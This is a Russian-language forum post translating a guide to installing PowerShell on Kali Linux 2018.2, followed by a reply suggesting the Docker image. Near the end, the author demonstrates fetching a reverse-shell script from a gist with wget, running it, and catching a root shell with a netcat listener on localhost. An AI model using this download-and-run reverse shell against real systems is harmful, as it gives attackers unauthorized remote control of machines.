Установка PowerShell на Kali Linux

[Underwood]

Приветствую уважаемых участников и гостей форума!
В этой статье, хочу представить вольный перевод инструкции по установке PowerShell на Kali Linux 2018.2 c небольшими авторскими правками. Но для начала несколько слов о том что такое

Ссылка скрыта от гостей

- язык автоматизации задач администрирования от Microsoft с открытым исходным кодом, построенный на платформе .NET Framework, состоящий из оболочки с интерфейсом командной строки и сопутствующего языка сценариев, созданный для того чтобы контролировать и автоматизировать администрирование Windows, а теперь и Linux, операционные системы и приложения, которые работают на них. А точки зрения хакера, PowerShell - универсальный ключ для всех дверей, по умолчанию установленный во всех версиях OC Windows и предоставляющий практически безграничные возможности.

Установка PowerShell на Kali Linux 2018.2
Начнем с установки необходимых зависимостей, хотя большинство из них по умолчанию уже установлены на Kali Linux 2018.2

apt update && apt -y install curl gnupg apt-transport-https

Далее, необходимо загрузить и добавить GPG-ключ публичного репозитория Microsoft, чтобы пакетный менеджер APT считал источник доверенным и мог предупреждать вас о любых проблемах с сигнатурами пакетов.

curl https://packages.microsoft.com/keys/microsoft.asc | apt-key add -

Далее, необходимо внести изменения в /etc/apt/sources.list.d/ и обновить список доступных пакетов.

echo "deb [arch=amd64] https://packages.microsoft.com/repos/microsoft-debian-stretch-prod stretch main" > /etc/apt/sources.list.d/powershell.list
apt update

Устанавливаем PowerShell

apt -y install powershell-preview

Запуск PowerShell

root@kali:~# pwsh-preview 
PowerShell v6.1.0-preview.4
Copyright (c) Microsoft Corporation. All rights reserved.

https://aka.ms/pscore6-docs
Type 'help' to get help.

PS /root>

Обновим встроенную справку, используя командлет Update-Help

PS /root> Update-Help                                                     
Updating Help for module Microsoft.PowerShell.Utility                        
Locating Help Content...

Не все привычные команды, используемые в Windows пока работают в Linux версии, но все ключевые модули уже представлены и в данный момент разработчиками активно работают над этим.

PS /root> Get-Process -Name gnome*                                        

NPM(K)    PM(M)      WS(M)     CPU(s)      Id  SI ProcessName
------    -----      -----     ------      --  -- -----------
      0     0.00       5.71       0.03    1073 072 gnome-keyring-d
      0     0.00       9.80       0.19     659 649 gnome-session-b
      0     0.00      13.72       0.36    1089 080 gnome-session-b
      0     0.00     110.06       3.36     778 649 gnome-shell
      0     0.00     277.15      27.85    1170 080 gnome-shell
      0     0.00      11.77       0.09    1199 075 gnome-shell-cal
      0     0.00      77.79       4.58    1381 080 gnome-software
      0     0.00      36.58       2.03    1646 646 gnome-terminal-

Для примера, можно поиграться с PowerShell reverse shell к поднятому с помощью Netcat listener

root@kali:~# pwsh-preview 
PowerShell v6.1.0-preview.4
Copyright (c) Microsoft Corporation. All rights reserved.

https://aka.ms/pscore6-docs
Type 'help' to get help.

PS /root> wget -q https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1
PS /root> ./mini-reverse.ps1                                                                                                                              
────────────────────────────────────────────────────────────────────────────────
root@kali:~# nc -lvnp 413
listening on [any] 413 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 59006
id
uid=0(root) gid=0(root) groups=0(root)

uname -a
Linux kali 4.15.0-kali3-amd64 #1 SMP Debian 4.15.17-1kali1 (2018-04-25) x86_64 GNU/Linux

Ссылка скрыта от гостей

Благодарю за внимание!

 

[n01n02h]

пару дней назад нужен был повершел, винды не было, приведенный выше способ корректно работать отказался.
Самый легкий выход:

docker pull microsoft/powershell
docker run -it microsoft/powershell